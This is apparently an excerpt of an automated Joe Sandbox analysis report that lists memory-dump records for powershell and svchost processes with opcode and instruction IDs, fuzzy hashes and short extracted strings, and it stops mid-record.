                                                                                  • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261877810.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                                  • Instruction ID: 946d9dd0be3e31e92e31b6aa2b10c29eb52eec7d3bcc3dcfb891e7db44d33978
                                                                                  • Opcode Fuzzy Hash: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                                  • Instruction Fuzzy Hash: 58F0E232B0D5448FD7A8EB4CE4908E873E1FF6632071100BAE25DC75A7DA2AEC44C791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261877810.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                                  • Instruction ID: df5c480e0c9b0ebfbbd45cf0efcafda051472a082e934bb7b6ccbce8896b4574
                                                                                  • Opcode Fuzzy Hash: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                                  • Instruction Fuzzy Hash: 96F0E932B0D5448FD794EB5CE0908E473E0FF0632474100BAE14DC7463DA2AEC44C750
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261877810.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: 566e199897b6c6f58583f472757ff017edf9d80432fcb0fd557552598e1d1624
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: D2E04F31B0C818CFDAA8DA0CE090DE973E1EFA933171101BBD24EC7565DA26EC51DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261341230.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ce978aa5f548b222dd4f97ad902e2ecb1ad316115e3cc5b868f12f85cb868d99
                                                                                  • Instruction ID: 03b6b4a0706a21d2b1e7de1ba40a747d5c3702f5f7a252a9ebac8fcff3a34c16
                                                                                  • Opcode Fuzzy Hash: ce978aa5f548b222dd4f97ad902e2ecb1ad316115e3cc5b868f12f85cb868d99
                                                                                  • Instruction Fuzzy Hash: 8CE01A35908A4C8F9B55EF18C85A4E97BE0FB69311B04029AE90DC7161DB759958CBC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2261341230.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                  • API String ID: 0-3225005683
                                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction ID: c8f5dac7c87642043c643811192ed0d3f1ce2d220aeccaec631159cc4bf272a0
                                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction Fuzzy Hash: 1A21D1B77085256ED2127BFDB8255EE3764CB9437434962B2D2989B053EA34708A8AE0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2365342672.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd3477d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8l=
                                                                                  • API String ID: 0-1935373448
                                                                                  • Opcode ID: de66058c1e47d2f1c4b186119eb53513eae76e4f8d113ed779336697bdd4288d
                                                                                  • Instruction ID: c45b41f93a40a4c0bb93435b52f48f13d5203cece02a62071b73878b4a6f8a04
                                                                                  • Opcode Fuzzy Hash: de66058c1e47d2f1c4b186119eb53513eae76e4f8d113ed779336697bdd4288d
                                                                                  • Instruction Fuzzy Hash: 7D41277041DBC48FE7568B289C95A623FF0EF57320B1946DFD088CB1A3D629B846C792
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d19c076e8a2fc4dfd874ae6d46cd2e5a9662bdbc95a230b343545f7ba481f3f3
                                                                                  • Instruction ID: ae1f6314dd10a59bc6683636ca6d91b211368721b93e216bb36512a65349cfc4
                                                                                  • Opcode Fuzzy Hash: d19c076e8a2fc4dfd874ae6d46cd2e5a9662bdbc95a230b343545f7ba481f3f3
                                                                                  • Instruction Fuzzy Hash: 82218E26A1EBC55FD7539B786C790D57FB0EF13254B0D00E7D589CB0A3E9185809C792
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3390301aa9a691cc49d39d7523770fe76a9b0e7322a01908f15912c4645233a4
                                                                                  • Instruction ID: 82b7c7860f8bb3dcd8d1d4b36ee75689519bfaaa463adb06a0eeb0860ea2e0cf
                                                                                  • Opcode Fuzzy Hash: 3390301aa9a691cc49d39d7523770fe76a9b0e7322a01908f15912c4645233a4
                                                                                  • Instruction Fuzzy Hash: 1A41F67190DF888FDB199F5C98466A97BE0FB9A311F04426FE449C3252CA74A816CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 147067094444814159960fe1517415b145d205a54733062dfd288c5aa0210a3e
                                                                                  • Instruction ID: d974766809698e48646380eb5ea5ff46df1916a53737868df01dda90b19e8cbf
                                                                                  • Opcode Fuzzy Hash: 147067094444814159960fe1517415b145d205a54733062dfd288c5aa0210a3e
                                                                                  • Instruction Fuzzy Hash: 61213A3090CB8C4FEB59DFAC984A7E97FF0EB56321F04416BD049C3152DA74A846CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366789650.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34960000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
                                                                                  • Instruction ID: 4142992b9a7abf350f55ddb053b6a08169c48cbfd0aa72e89a6efd89a620e93c
                                                                                  • Opcode Fuzzy Hash: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
                                                                                  • Instruction Fuzzy Hash: 19110672B0D6884FEB55EAA844E41A87BD1EF56334B0840BEC54CD7097CD2DAC45C360
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 070aaecec1a5bd2acfe83f123d0c32b916124794bed90c687e5867e715e599dd
                                                                                  • Instruction ID: b3a8607a5eb55a3a5b10797081676ce3825fcc95d2eb978fedc4d3214a42b38d
                                                                                  • Opcode Fuzzy Hash: 070aaecec1a5bd2acfe83f123d0c32b916124794bed90c687e5867e715e599dd
                                                                                  • Instruction Fuzzy Hash: 10F03C7664D7820FE356476CAC630A47FE0DF5323070902EBD585CA4A3D61A584B8751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366789650.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34960000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1106c3f142613d31307eda6d362875a5cb114dfdba7eb985f4d619f737bf1154
                                                                                  • Instruction ID: 493184370e3a3799f06dd5a91d6a8c995f5545d50ce6e3925416af9c9e0f05bd
                                                                                  • Opcode Fuzzy Hash: 1106c3f142613d31307eda6d362875a5cb114dfdba7eb985f4d619f737bf1154
                                                                                  • Instruction Fuzzy Hash: 5FF0B432B0D5448FD768EB8CE4908E473E1EF6633071100BAE15DC75A7CA2AEC44CB55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366789650.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34960000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 467f34015529be1d90b75499303328e671bcfe105511f1352741bbb2b473468e
                                                                                  • Instruction ID: 8881b5999b3a546595498e60c351ade43eaca4e4a83f679ae0199465fa6b0a39
                                                                                  • Opcode Fuzzy Hash: 467f34015529be1d90b75499303328e671bcfe105511f1352741bbb2b473468e
                                                                                  • Instruction Fuzzy Hash: A8F0BE32A0D5448FDB55EB8CE0914E873E0FF0633474100BAE64DCB4A3DA2AAC44CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366789650.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34960000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: 58f1382bb6993b943f8ab3d8c690b4bd7c13bec444ad5981856bae3d5ed08961
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: A8E01A31B0C818CFDA68DA4CE090DE973E1EBA933171201BBD24EC7565CA2AEC519B94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2366083015.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                  • API String ID: 0-2388461625
                                                                                  • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                  • Instruction ID: 2eaac6df7339b602911387a99d3455c6d144505c115b379a1cd37fdca4f332d7
                                                                                  • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                  • Instruction Fuzzy Hash: C521F273A085215AC31237FCBDB15D96B95DB5437834901F3E218DF113E978B48B8682
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2538668534.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: I
                                                                                  • API String ID: 0-3707901625
                                                                                  • Opcode ID: c9c2f1611ae4509e563a247eb8b9843e365e76d101a0df45d20b9d957b14f3eb
                                                                                  • Instruction ID: c3f31cd50a93573f55540c35b8908cfeebd441abf2eec0a9b1cbba9f0e395c5a
                                                                                  • Opcode Fuzzy Hash: c9c2f1611ae4509e563a247eb8b9843e365e76d101a0df45d20b9d957b14f3eb
                                                                                  • Instruction Fuzzy Hash: 5A514822B0DA568FEBD9DA1C94A167577D2EFA6220B5800BEC24DC7197EE18EC058351
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2538668534.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: I
                                                                                  • API String ID: 0-3707901625
                                                                                  • Opcode ID: 8a39f8220c63a549ea70eccaed5394b26649ef9ccbd15e5bed807b4e9ebad4a4
                                                                                  • Instruction ID: da9e2d23806c5a5e5bf642a18cc5d1fee7f852a229e3f1f44702e1d9c7e5c825
                                                                                  • Opcode Fuzzy Hash: 8a39f8220c63a549ea70eccaed5394b26649ef9ccbd15e5bed807b4e9ebad4a4
                                                                                  • Instruction Fuzzy Hash: 4421F222B0DA968FE7E5DA1C84F057166C2EF66210B4900BED65DC71ABEE1CEC049311
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2537724134.00007FFD348B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd348b5000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75991a3a6f5e5b793c86689fb6e36e8062e474206ac477246450c42bce0b92de
                                                                                  • Instruction ID: 554fb8269e95eae3a64837b3381055f73d3267ed6864b4a566a52134574e2699
                                                                                  • Opcode Fuzzy Hash: 75991a3a6f5e5b793c86689fb6e36e8062e474206ac477246450c42bce0b92de
                                                                                  • Instruction Fuzzy Hash: D2D18030A08A4D8FDF95DF58C4A5AA97BE1FF69300F14416AD40DE72A6CE74E881DBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2537724134.00007FFD348B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd348b5000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1787c8b33baf51d57ffcd71a3c52a106b98549c447fe304e576ef1f05a0e5bfa
                                                                                  • Instruction ID: 879129887c8f35761ea2c2813bfa91f03afea7a00de63ad9a8ff782e5332ac7e
                                                                                  • Opcode Fuzzy Hash: 1787c8b33baf51d57ffcd71a3c52a106b98549c447fe304e576ef1f05a0e5bfa
                                                                                  • Instruction Fuzzy Hash: C751FE77E099854FE711AB6CA8B60E53BA0DF53329F0C01B6C598CB053FD69241B9AC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2537724134.00007FFD348B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd348b5000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de69892cbd842d5edeba8c87ee97e260c448b49dda72e46bee226970a219068b
                                                                                  • Instruction ID: 7f5b7e84130b1c38667261da80bb6db41d392e0940f6ce8af0951ffae7ec2dad
                                                                                  • Opcode Fuzzy Hash: de69892cbd842d5edeba8c87ee97e260c448b49dda72e46bee226970a219068b
                                                                                  • Instruction Fuzzy Hash: 9B21073190C74C8FDB59DFAC988A7E97FF0EB96321F04426BD048C3152DA74A41ACB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2538668534.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
                                                                                  • Instruction ID: 7b856670e83582b4b55e90548cfd6971a1b1b29ad17c107cd1f3225bce55f71d
                                                                                  • Opcode Fuzzy Hash: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
                                                                                  • Instruction Fuzzy Hash: A8110632B0D68C4FEB95EA9C44E41A87BD1EF5A310F0840BEC54CDB097CD29AC45C360
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2536729512.00007FFD3479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3479D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd3479d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                  • Instruction ID: 2a4638ced51511fa509d91cb462abba1804df7d47760f9af06298ac75b0424a9
                                                                                  • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                  • Instruction Fuzzy Hash: 2D014F3161CE088F9AA8EF1DE485D5237E1FB98321710065AD45DC755AD735F891CBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2537724134.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2538668534.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7fd488a8413d2e00986baaa8a4144131805f237ac1a0c58eb702a818d303ee7
                                                                                  • Instruction ID: 00008f753218c0a424339306bef9fba1a5bb7a67bcddebfa5a186e99c03475b2
                                                                                  • Opcode Fuzzy Hash: a7fd488a8413d2e00986baaa8a4144131805f237ac1a0c58eb702a818d303ee7
                                                                                  • Instruction Fuzzy Hash: 0DF0BE32A0D5448FDB94EB5CE0908A877E0FF06324B4100BAE24DC70A3EA2AAC44CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000C.00000002.2537724134.00007FFD348B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_12_2_7ffd348b5000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                  • API String ID: 0-3225005683
                                                                                  • Opcode ID: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                                  • Instruction ID: c8f5dac7c87642043c643811192ed0d3f1ce2d220aeccaec631159cc4bf272a0
                                                                                  • Opcode Fuzzy Hash: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                                  • Instruction Fuzzy Hash: 1A21D1B77085256ED2127BFDB8255EE3764CB9437434962B2D2989B053EA34708A8AE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e631407b336867dac1c3201f6cc1faf63e823a72c798a01f83df75611665203
                                                                                  • Instruction ID: e1c4079723a7d4d2c87e28d0fa3dff694f719599f09e939e6e7dd0b22bbf8681
                                                                                  • Opcode Fuzzy Hash: 5e631407b336867dac1c3201f6cc1faf63e823a72c798a01f83df75611665203
                                                                                  • Instruction Fuzzy Hash: F722D620B18A494FE798F7AC84B52B9B7D2FF99305F44057AE44EC32D6DE2CAC019B41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 533cd2f7d72a8306e0b77e5cd248d148142aefbbcf746fc963e5e0c9604df1cd
                                                                                  • Instruction ID: 78911fa9aae4e5e0e854bf0a8813c88f62641b40b67b9962f80f4cec238777dd
                                                                                  • Opcode Fuzzy Hash: 533cd2f7d72a8306e0b77e5cd248d148142aefbbcf746fc963e5e0c9604df1cd
                                                                                  • Instruction Fuzzy Hash: 7D51EF10B1E6C54FE796A7B858B52B5BFD5DF87229B0800FBE089C71E3DD586806C342
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 9L_^
                                                                                  • API String ID: 0-1679237627
                                                                                  • Opcode ID: 48338376ba24464ffc40c410d2a0f4efe820632c8e95a42d81e98a4e301a80b4
                                                                                  • Instruction ID: 6261282b3ab87af69812e37833d5ceb6028a7129e76ff23b9c47a1f78bf0fae6
                                                                                  • Opcode Fuzzy Hash: 48338376ba24464ffc40c410d2a0f4efe820632c8e95a42d81e98a4e301a80b4
                                                                                  • Instruction Fuzzy Hash: 13614526B0891A5BE711BBFCA4721FD77A5EF86366B180136C10CE7293CE38748687D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4L_^
                                                                                  • API String ID: 0-2524838182
                                                                                  • Opcode ID: 0a1555a9cab9d8263af102a20f86ddb9ba69668c01168d60ec385fc185985ba9
                                                                                  • Instruction ID: ef87bd7ca453d6b8d8da61420b6f729240d5b60a41cfa7b53ac72fe7e392f5e0
                                                                                  • Opcode Fuzzy Hash: 0a1555a9cab9d8263af102a20f86ddb9ba69668c01168d60ec385fc185985ba9
                                                                                  • Instruction Fuzzy Hash: 11510721B1D68A0FE3A6A7BC58762BA7BE5DF87221B0940FBD48CC7193DD1C5C468352
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3c1731445da0c121a4906813081ee722e2bcecce652bde70b726364b9879085
                                                                                  • Instruction ID: 42aaf35f0bfd651c5032ffe58561d25c6b8bd22e07a74aa91fbbbdbaddca740d
                                                                                  • Opcode Fuzzy Hash: a3c1731445da0c121a4906813081ee722e2bcecce652bde70b726364b9879085
                                                                                  • Instruction Fuzzy Hash: 5F219327A0D6954FE751A7BC99B20E97BB1EF43324B0901B7C188DB193EE2C68068781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ccfd5772e7a6185b84a9de1810fba448c2b6f810ab15c57467458d7bc236391b
                                                                                  • Instruction ID: 1b4d81736583bd7150137f2cfa9fe3e69f60a1ff2a45aacc93d11d01911d9862
                                                                                  • Opcode Fuzzy Hash: ccfd5772e7a6185b84a9de1810fba448c2b6f810ab15c57467458d7bc236391b
                                                                                  • Instruction Fuzzy Hash: 72A169267089565BD711BBFCB8621FD7BA0EF86362B180177C148DB193CA38748AC7D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000013.00000002.2809876920.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_19_2_7ffd348c0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
